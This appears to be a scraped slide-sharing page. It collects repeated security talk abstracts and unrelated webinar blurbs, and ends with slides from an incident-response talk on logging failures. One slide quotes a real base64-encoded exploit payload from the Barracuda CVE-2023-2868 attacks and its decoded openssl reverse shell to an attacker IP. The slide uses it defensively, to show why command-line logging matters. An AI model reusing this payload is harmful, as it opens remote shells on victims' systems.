Incident Response Fails – What we see with our clients, and their fails. As Incident Responders, what do we see as Incident Responders that you can do to be better prepared, reduce your incident costs, get answers faster and reduce the cost of an IR Firm if needed.
HackerHurricane
Malware Archaeology
MalwareArchaeology
LOG-MD
Organizations are moving data and applications into public cloud services at a rapid pace. As the public cloud footprint expands, red teams and attackers are reinventing the kill chain in the cloud. Public cloud services provide new, creative ways to discover assets, compromise credentials, move laterally, and exfiltrate data. In this keynote, we explore common techniques from the MITRE ATT&CK Cloud Matrix. For each technique, attendees will analyze misconfigurations, exploitation paths, and common architecture patterns for breaking the kill chain.
You'll understand how hackers can attack resources hosted in the Azure and protect Azure infrastructure by identifying vulnerabilities, along with extending your pentesting tools and capabilities.
Continuation of the v1 presentation with new slides for the v2 instance metadata service.
Cloud Metadata Services are popular targets for attackers trying to gain direct access to an organization’s cloud resources. The Capital One breach notification published in July put a spotlight on the metadata service and its weaknesses. Using publicly available information from the breach, we will demonstrate how the attacker compromised AWS instance metadata credentials, gained access to privileged resources, and exfiltrated data from the account. The conversation then shifts to a post mortem discussion about cloud security controls that could have prevented or limited the blast radius of the attack.
Organizations are moving data and applications into public cloud services at a rapid pace. As the public cloud footprint expands, red teams and attackers are reinventing the kill chain in the cloud. Public cloud services provide new, creative ways to discover assets, compromise credentials, move laterally, and exfiltrate data. In this keynote, we explore common techniques from the MITRE ATT&CK Cloud Matrix. For each technique, attendees will analyze misconfigurations, exploitation paths, and common architecture patterns for breaking the kill chain.
You'll understand how hackers can attack resources hosted in the Azure and protect Azure infrastructure by identifying vulnerabilities, along with extending your pentesting tools and capabilities.
Continuation of the v1 presentation with new slides for the v2 instance metadata service.
Cloud Metadata Services are popular targets for attackers trying to gain direct access to an organization’s cloud resources. The Capital One breach notification published in July put a spotlight on the metadata service and its weaknesses. Using publicly available information from the breach, we will demonstrate how the attacker compromised AWS instance metadata credentials, gained access to privileged resources, and exfiltrated data from the account. The conversation then shifts to a post mortem discussion about cloud security controls that could have prevented or limited the blast radius of the attack.
Pre-auth SYSTEM RCE on Windows Is more common than you think
----
With minimal to no effort, we can gain SYSTEM level access to hundreds, if not, thousands of machines on the internet [remotely]. No, this is not a new super 1337 exploit and no this is not even a new technique. No super fancy website with poorly designed logo is necessary, there is nothing new here. Tim and Dennis have discovered that something only stupid sysadmins would do turns out to be much more prevalent than expected. What starts off as a sysadmin's innocent attempt to fix an issue, turns into complete compromise of entire servers/workstations with no effort needed from the attacker. Tim and Dennis will discuss how we came to this realization and explain how we automated looking for these issues in order to find hundreds of vulnerable machines over the internet. Tim and Dennis explain the tool developed for automation, provide statistics discovered from our research, and go over ways to protect yourself from falling victim to the issue.
As more development environments roll infrastructure into AWS, they are also responsible with implementing the security controls to protect those resources being used. Some organizations create separate AWS accounts for development stages, others leverage a single AWS account with separate VPC's for each business unit. In all scenarios, pentesters are commonly tasked with testing thousands of resources spread across numerous AWS accounts and implemented within all available regions. To remain effective in analyzing security risks, pentesters must adapt to these emerging technology scopes while using techniques that aid in the discovery of vulnerabilities, exploit the technology stacks, and report verified risks to bring value to the organization.
In this presentation, I will demonstrate adaptive techniques to scale AWS pentesting across hundreds of accounts and thousands of resources. Next, I will focus on the exploitation, lateral movement, and privilege escalation phases of the engagement to highlight some pentesting methodology for those looking to get their start with AWS penetration tests. Finally, I will release a tool to help extract the discovered vulnerabilities and generate boilerplate language for the report.
Amazon Inspector is a service from AWS that identifies security issues in your application deployments. Use Amazon Inspector with your applications to assess your security posture and identify areas that can be improved. Amazon Inspector works with your Amazon EC2 instances to monitor activity in your applications and system. This session will cover getting started with Amazon Inspector, how to automate the process, how to manage and act on findings, and additional ways you can enhance your development and release lifecycle.
Slides from a talk given at DevSecCon on 206h October 2016 http://www.devseccon.com/blog/session/automating-owasp-zap/
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular and best maintained free security tools. In this workshop you will learn how to automate security tests using ZAP. These tests can then be included in your continuous integration / delivery pipeline. Simon will cover the range of integration options available and then walk you through automating ZAP against a test application. The ZAP UI will be used to explain the concepts and python scripting used to drive ZAP via its API – this can then also be used to drive ZAP in daemon mode.
This workshop is aimed at anyone interested in automating ZAP for security testing, including developers, functional testers (QA) and security/pentesters.
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Vaticle
⚛️ Building a cyber threat intelligence knowledge management system using Grakn
Knowledge of cyber threats is a key focus in many areas of cybersecurity. Adapting intrusion detection systems, building relevant red team scenarios, guiding incident response activities, providing a more effective risk assessment through better knowledge of threat agents: all of these require a deep understanding of the issues related to the relevant cyber threats and its associated human and technical elements. During this talk, we will describe how we are using the hyper-relational data model, the logical inferences and the core features of Grakn to build an application (openCTI) allowing organizations to manage their cyber threat intelligence knowledge and technical observables. We will go through the data model, the implementation of nested relations and give you an overview on how you can create powerful applications using Grakn.
Don't forget to check out the openCTI project here --> www.opencti.io
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
How to set up a Threat Hunting Team for Active Defense utilizing Cyber Threat Intelligence and how CTI can help a company grow and improve its security posture.
Conduct a few internal pen tests and you’re bound to come across Jenkins, the world’s most popular build automation server. When you encounter it, what do you do? Go beyond a 5-minute Google search and checking for open script consoles. This talk dives into various ways to exploit Jenkins and how to move laterally into sensitive systems.
Guide To Jenkins Management Continuous Integration And Useful Plugins Complet...SlideTeam
Guide To Jenkins Management Continuous Integration And Useful Plugins Complete Deck satisfies the presentation needs of upper and mid-level managers. Through this PowerPoint template deck, you can give all the essential information about Jenkins software. Use our PPT theme to elucidate the features of Jenkins automation server. This PowerPoint presentation makes an explanation of Jenkins continuous integration easy through cutting-edge data visualization. Take advantage of our PPT format to elaborate on Jenkins advantages as well as architecture. Download this Jenkins application PowerPoint slideshow to gain access to the Jenkins cheat sheet. Educate your audience about various plugins for Jenkins useful in building up a project. Employ this presentation to showcase the difference between continuous integration, continuous delivery, and continuous deployment. This will help your organization to implement Jenkins in an effective manner. Software engineers can also use this virtual tool for educational purposes. So, hit the download icon and begin instant personalization. https://bit.ly/3nSvfNq
Application monitoring is being talked about a lot these days and it helps provide key information that is helpful in developing better software and also in taking some key business decision. Datadog offers monitoring as a service.
When your security tools fail you, and what you can do about it. This discusses actual tool fail backgrounds, what failed and what you can do to detect and/or mitigate the issues(s) another way
HackerHurricane
MalwareArchaeology
Malware Archaeology
LOG-MD
How to Leverage Log Data for Effective Threat DetectionAlienVault
Event logs provide valuable information to troubleshoot operational errors, and investigate potential security exposures. They are literally the bread crumbs of the IT world. As a result, a commonly-used approach is to collect logs from everything connected to the network "just in case" without thinking about what data is actually useful. But, as you're likely aware, the "collect everything" approach can actually make threat detection and incident response more difficult as you wade through massive amounts of irrelevant data.
Join us for this session to learn practical strategies for defining what you actually need to collect (and why) to help you improve threat detection and incident response, and satisfy compliance requirements. In this session, you'll learn :
*What log data you always need to collect and why
*Best practices for network, perimeter and host monitoring
*Key capabilities to ensure easy, reliable access to logs for incident response efforts
*How to use event correlation to detect threats and add valuable context to your logs
Pre-auth SYSTEM RCE on Windows Is more common than you think
----
With minimal to no effort, we can gain SYSTEM level access to hundreds, if not, thousands of machines on the internet [remotely]. No, this is not a new super 1337 exploit and no this is not even a new technique. No super fancy website with poorly designed logo is necessary, there is nothing new here. Tim and Dennis have discovered that something only stupid sysadmins would do turns out to be much more prevalent than expected. What starts off as a sysadmin's innocent attempt to fix an issue, turns into complete compromise of entire servers/workstations with no effort needed from the attacker. Tim and Dennis will discuss how we came to this realization and explain how we automated looking for these issues in order to find hundreds of vulnerable machines over the internet. Tim and Dennis explain the tool developed for automation, provide statistics discovered from our research, and go over ways to protect yourself from falling victim to the issue.
As more development environments roll infrastructure into AWS, they are also responsible with implementing the security controls to protect those resources being used. Some organizations create separate AWS accounts for development stages, others leverage a single AWS account with separate VPC's for each business unit. In all scenarios, pentesters are commonly tasked with testing thousands of resources spread across numerous AWS accounts and implemented within all available regions. To remain effective in analyzing security risks, pentesters must adapt to these emerging technology scopes while using techniques that aid in the discovery of vulnerabilities, exploit the technology stacks, and report verified risks to bring value to the organization.
In this presentation, I will demonstrate adaptive techniques to scale AWS pentesting across hundreds of accounts and thousands of resources. Next, I will focus on the exploitation, lateral movement, and privilege escalation phases of the engagement to highlight some pentesting methodology for those looking to get their start with AWS penetration tests. Finally, I will release a tool to help extract the discovered vulnerabilities and generate boilerplate language for the report.
Amazon Inspector is a service from AWS that identifies security issues in your application deployments. Use Amazon Inspector with your applications to assess your security posture and identify areas that can be improved. Amazon Inspector works with your Amazon EC2 instances to monitor activity in your applications and system. This session will cover getting started with Amazon Inspector, how to automate the process, how to manage and act on findings, and additional ways you can enhance your development and release lifecycle.
Slides from a talk given at DevSecCon on 206h October 2016 http://www.devseccon.com/blog/session/automating-owasp-zap/
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular and best maintained free security tools. In this workshop you will learn how to automate security tests using ZAP. These tests can then be included in your continuous integration / delivery pipeline. Simon will cover the range of integration options available and then walk you through automating ZAP against a test application. The ZAP UI will be used to explain the concepts and python scripting used to drive ZAP via its API – this can then also be used to drive ZAP in daemon mode.
This workshop is aimed at anyone interested in automating ZAP for security testing, including developers, functional testers (QA) and security/pentesters.
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Vaticle
⚛️ Building a cyber threat intelligence knowledge management system using Grakn
Knowledge of cyber threats is a key focus in many areas of cybersecurity. Adapting intrusion detection systems, building relevant red team scenarios, guiding incident response activities, providing a more effective risk assessment through better knowledge of threat agents: all of these require a deep understanding of the issues related to the relevant cyber threats and its associated human and technical elements. During this talk, we will describe how we are using the hyper-relational data model, the logical inferences and the core features of Grakn to build an application (openCTI) allowing organizations to manage their cyber threat intelligence knowledge and technical observables. We will go through the data model, the implementation of nested relations and give you an overview on how you can create powerful applications using Grakn.
Don't forget to check out the openCTI project here --> www.opencti.io
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
How to set up a Threat Hunting Team for Active Defense utilizing Cyber Threat Intelligence and how CTI can help a company grow and improve its security posture.
Conduct a few internal pen tests and you’re bound to come across Jenkins, the world’s most popular build automation server. When you encounter it, what do you do? Go beyond a 5-minute Google search and checking for open script consoles. This talk dives into various ways to exploit Jenkins and how to move laterally into sensitive systems.
Guide To Jenkins Management Continuous Integration And Useful Plugins Complet...SlideTeam
Guide To Jenkins Management Continuous Integration And Useful Plugins Complete Deck satisfies the presentation needs of upper and mid-level managers. Through this PowerPoint template deck, you can give all the essential information about Jenkins software. Use our PPT theme to elucidate the features of Jenkins automation server. This PowerPoint presentation makes an explanation of Jenkins continuous integration easy through cutting-edge data visualization. Take advantage of our PPT format to elaborate on Jenkins advantages as well as architecture. Download this Jenkins application PowerPoint slideshow to gain access to the Jenkins cheat sheet. Educate your audience about various plugins for Jenkins useful in building up a project. Employ this presentation to showcase the difference between continuous integration, continuous delivery, and continuous deployment. This will help your organization to implement Jenkins in an effective manner. Software engineers can also use this virtual tool for educational purposes. So, hit the download icon and begin instant personalization. https://bit.ly/3nSvfNq
Application monitoring is being talked about a lot these days and it helps provide key information that is helpful in developing better software and also in taking some key business decision. Datadog offers monitoring as a service.
When your security tools fail you, and what you can do about it. This discusses actual tool fail backgrounds, what failed and what you can do to detect and/or mitigate the issues(s) another way
HackerHurricane
MalwareArchaeology
Malware Archaeology
LOG-MD
How to Leverage Log Data for Effective Threat DetectionAlienVault
Event logs provide valuable information to troubleshoot operational errors, and investigate potential security exposures. They are literally the bread crumbs of the IT world. As a result, a commonly-used approach is to collect logs from everything connected to the network "just in case" without thinking about what data is actually useful. But, as you're likely aware, the "collect everything" approach can actually make threat detection and incident response more difficult as you wade through massive amounts of irrelevant data.
Join us for this session to learn practical strategies for defining what you actually need to collect (and why) to help you improve threat detection and incident response, and satisfy compliance requirements. In this session, you'll learn :
*What log data you always need to collect and why
*Best practices for network, perimeter and host monitoring
*Key capabilities to ensure easy, reliable access to logs for incident response efforts
*How to use event correlation to detect threats and add valuable context to your logs
SpiceWorks Webinar: Whose logs, what logs, why logs AlienVault
Securing your environment requires an understanding of the current and evolving threat landscape as well as knowledge of network technology and system design. This session will combine lecture, demo and interactive Q/A that will highlight how to build out a security plan to defend against today’s threats. Join AlienVault for this webinar to learn:
• What network, system and host data you should be collecting for the quickest path to security visibility
• Best practices for network, perimeter and host monitoring
• Security advantages of new AlienVault Threat Alerts coming soon to SpiceWorks
CNIT 121: 6 Discovering the Scope of the Incident & 7 Live Data CollectionSam Bowne
Slides for a college course based on "Incident Response & Computer Forensics, Third Edition" by by Jason Luttgens, Matthew Pepe, and Kevin Mandia.
Teacher: Sam Bowne
Website: https://samsclass.info/121/121_F16.shtml
CNIT 152: 6 Scoping & 7 Live Data CollectionSam Bowne
Slides for a college course based on "Incident Response & Computer Forensics, Third Edition" by by Jason Luttgens, Matthew Pepe, and Kevin Mandia, at City College San Francisco.
Website: https://samsclass.info/152/152_F18.shtml
[CB20] Keynote2:Practical and Intelligent Incident Response Planning by Russ ...CODE BLUE
The success of incident response engagements is based on the planning your organization does before a security incident occurs. The creation of a high-quality response plan in advance of a security incident means your organization has considered critical factors of success and is prepared to react professionally and effectively to minimize the impact to your organization and your customers. In this keynote, I will highlight some key considerations to help create an incident response plan specific to your organization and industry and discuss some of the common issues faced when responding to a compromise or ransomware.
CNIT 152: 4 Starting the Investigation & 5 LeadsSam Bowne
Slides for a college course based on "Incident Response & Computer Forensics, Third Edition" by by Jason Luttgens, Matthew Pepe, and Kevin Mandia, at City College San Francisco.
Website: https://samsclass.info/152/152_F18.shtml
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
Can we really detect advanced attacks? This session walks through 4 published attacks to point out what we can learn and detect using malware management, some cheat sheets and Security 101. LOG-MD, FILE-MD, Malware Archaeology
This talk is a summarized view of the various other talks in my profile. It was given to TACOM HQ LCMC as part of the "Our Shared Responsibility" initiative.
This is a good topical overview with some technical information.
Slides for a college course based on "Incident Response & Computer Forensics, Third Edition" by by Jason Luttgens, Matthew Pepe, and Kevin Mandia.
Teacher: Sam Bowne
Website: https://samsclass.info/121/121_F16.shtml
Traits exhibited by your best, smartest, and hardest working employee can be the same as those of the malicious (or sometimes even unwitting) insider.
Learn how to:
* Spot an insider threats
* Identify their network activity
*Incorporate best practices to protect your organization from the insider threat
2023 NCIT: Introduction to Intrusion DetectionAPNIC
APNIC Senior Security Specialist Adli Wahid presents an Introduction to Intrusion Detection at the 2023 NCIT, held in Suva, Fiji from 17 to 18 August 2023.
The methods and techniques that businesses employ to safeguard information are referred to as information security (or InfoSec). This includes setting up security measures to prohibit unauthorised users from accessing sensitive data. Network and infrastructure security are just two examples of the many areas that the topic of information security (InfoSec) encompasses.
Windows IR made easier and faster Find the head of the snake using Logs, AutoRuns, Large Registry Keys, Locked Files, IP/WhoIs and Netflow
Malware Archaeology
LOG-MD
BSidesNOLA
LOG-MD
Malware Archaeology
MalwareArchaeology.com
Email is the #1 way we get pwned, so how do they keep getting by our defenses and what can we do about it
Malware Archaeology
LOG-MD
Are Malware Sandboxes as good as manual malware analysis?
A look at some samples sent through automated malware sandboxes vs. manaul analysis
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
4. Being an Incident Responder
4 Public Consumption
• We get called when things get
• Clients want to know Who, What, Where, When, and How the
pwnage happened
• We all know why…
• So what do we consistently see with our clients? How are they
failing?
5. Level Set
5 Public Consumption
• Let us first define a few items
• Security 101 – Things you should always do, usually things
you already have and are FREE… well your time is needed
• Security 201 – Things you should have to “reduce” pwnage
and hopefully alert to suspicious activity
• Security 301 – Things you should be doing with your tools,
understand the gaps and address them with additional
tooling, process and/or procedures
• Security 501 – Doing things like Threat Hunting and being
proactive at seeking out the malicious behavior
6. This talk
6 Public Consumption
• This talk covers more of Security 101 and 201
• These are the things we see many, if not most
organizations are failing, forgot or did not continue
doing
• Organizations jump to Security 301 and forget to
continue Security 101 and 201
• This is the first #Fail we see
8. The 3 Cs
8 Public Consumption
What do we see our clients fail at?
Configuration
Local audit logging not optimally configured
Endpoint agents not optimally configured
Coverage
Endpoints missing one or more agents
Some or all log data (endpoint, cloud, network, internet facing) not
going to a log management solution
Completeness
Implement a process to validate and verify Configuration and
Coverage is “Complete”
9. Completeness
9 Public Consumption
When you roll out an agent…
Do you...
1. Validate the agent was properly installed?
2. Compare it to a list of known assets?
• Do you even know where or what all your assets are?
3. Verify the data is collecting properly?
4. Have a way to identify new systems as they come live?
5. Have a way to install agents on new systems quickly?
6. Verify the endpoint configuration is showing up in the proper
console(s)… regularly?
10. Why the 3 C’s are important
10
Public Consumption
• Incident Responders need data to discover what happened
to the detail level we can be sure
• This is so our clients can improve and close the gap(s) of why
the pwnage happened or wasn’t detected
• To reduce the cost and time of an Incident Response
investigation is always a goal
• It can save you 2x to 4x the cost of paying an Incident
Response firm
• You could be way ahead… IF you prepare
11. The 3 ‘s are FREE
11
Public Consumption
• You don’t have to spend $$$ to improve procedures and
processes
• Or tweak some settings
• People time is a cost, but not an external spend
• So spend some time on Preparation…. It is in the P in the
SANS PICERL model
• Many of our clients have incomplete or broken agent installs
and endpoint configuration is not optimal
• This means incomplete coverage and configuration
• Thus missing details and potentially the initial compromise
12. Windows Audit Logs
12 Public Consumption
We check Windows systems for what logging is enabled before
we perform triage to know what will likely be there…
There is a freely available tool to check your Windows logs
against some well known Cheat Sheets ;-)
Hint..
14. PowerShell Logging is inadequate
1 Public Consumption
• PowerShell is used a lot in all kinds of attacks
• Commodity, Ransomware, APT
• Command Line details missing
• ScriptBlock Logging improperly or not set
15. Audit Settings Fail
15 Public Consumption
• We need the data enabled and retained for a week or longer
16. WHOAMI
16
Public Consumption
• IF… Prevention worked so well
• THEN… Why are we having more pwnage than ever before?
• Can we change the term to something more realistic?
• Let’s consider it “Reduction”
• Now we can look at how we can reduce the likelihood, effort,
time, damage, costs, etc…
• Because we have not succeeded in preventing events
17. Threat Hunting
17
Public Consumption
• It’s all the rage
• Before you can do Threat Hunting and expect to actually find
anything
• You need to solve the 3 C’s and have one or more methods or
solutions to hunt with
• Fancy EDR Threat Hunting solution
• Or better yet a log management solution
• That collects all the “right” things
18. Threat Hunting
18
Public Consumption
• Our clients want to do it
• But the data is not enabled or being collected that is needed to
perform any decent hunting
• Same goes for performing Incident Response
• You need the data or we can’t do the best job as fast as we like
• Time is Money
20. Lack of Process Details
20
Public Consumption
• Why is EDR better than Anti-Virus?
• For one thing it looks at the parameters and associations of an
execution
• The details tell us WHAT the Bad Actor(s) are actually doing
• But EDR falls short on all the details as it tends to be execution
based, some have comms too
• But EDR alone is not enough
21. Some Clients Have EDR
21
Public Consumption
• Is it stopping all the attacks?
• No
• Does it see part of the attack?
• Yes
• Will I get all the details I need to investigate
• Probably not, depends on the solution
• Authentication monitoring is not common in EDR solutions, so lateral
movement is not detected until execution of something known bad
occurs
22. Anti-Virus NOT Being Used Well
22 Public Consumption
• We see clients with multiple AV solutions
• Why is this bad?
• Because getting the alert details into one place, like a Log
Management solution can be a pain for many AV solutions
• You need connectors to pull the data into your log
management
• We see Microsoft Defender alerts in the local logs, but no one
is looking or collecting it
23. Anti-Virus NOT Being Used Well
23
Public Consumption
• If a local log is available, use it!
• Collect the Defender Logs for the following Event IDs
• 1006, 1009, 1116, 1117, 1119
• Only created when it finds something, so low noise, high return
if you collect and alert on them
• We find one or more systems see a piece of an attack in the
Defender logs, but no one looked, so it was missed
24. Ransomware
24
Public Consumption
• Have you heard of this “new” attack?
• Most are due to passwords being compromised and then
logging into Internet facing systems, like RDP
• Some by emailed payloads or links
• Detection is very poor
• Solution that detects/stops the brute login not present
• Solution that detects/stops the mass encryption not present
26. Login Attempts
26
Public Consumption
Massive Login Attempts
• From the host being investigated
• We see 20, 40, 60… failed logins to an endpoint or device
• No alerting for obvious places failed login attempts in
mass should NOT be
• Failed logins provide the source IP and sometimes name
of the source attacking/attempting device
• Easy alert, IF endpoint data is being collected
• Most do not collect user endpoint login data
• Too bad as local logins to a host for a domain user are
rare
27. Lateral Movement
27
Public Consumption
• Lateral Movement
• From the host being investigated
• Bad guys use several methods, this is just one example
• Net.exe, Net1.exe
• You see 20 of these ‘net.exe’ in the logs, so what did they
actually do?
• NO Process Command Line being collected
• Which means there are no details, and much more work
to discover Where they went
28. Lateral Movement Details
28
Public Consumption
Net.exe - devil IS in the details
• WHAT Server/Workstation?
• WHAT Share?
• WHAT User?
• IF Process Command Line was being collected then you would see….
Net.exe Secret-ServerCredit-Cards /u:SuperDomainUser /p:Password123
29. BIG Difference
2 Public Consumption
Now if there were 20 of these events in the logs
• We would now know:
• What systems were connected to
• What shares, thus what data was exposed and possibly taken
• What user account(s) got pwned
• As an Incident Responder I now have more targets to investigate because I
KNOW they logged into these specific systems!
• GREAT Resource by JPCert on Lateral Movement
• https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
30. Save Your Sanity, Time, And Job
3 Public Consumption
• IF you collect the details, we can investigate in minutes/hours versus
days/weeks
• This equates to real $$$ saved
• Since time is money
• NIX and macOS ‘history’ of course we need too
31. NIX Example – Barracuda Email CVE-2023-2868
3 Public Consumption
• NIX and macOS ‘history’ of course we need too
• --Begin Encoded Payload--
• '`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW
50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvc
CI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
• --End Encoded Payload--
• The encoded block above decodes to a reverse shell seen below.
• --Begin Decoded Command--
• setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -
connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"
• --End Decoded Command--
32. More Lateral Movement
3 Public Consumption
• WMI is also used and does not log well
• Look for “/user:” and /password
• Remote WMI connections have a unique dual auth with Windows 10
and above, so look for these as sure fire indications of remote WMI
pwnage
• See my DerbyCon 2018 presentation
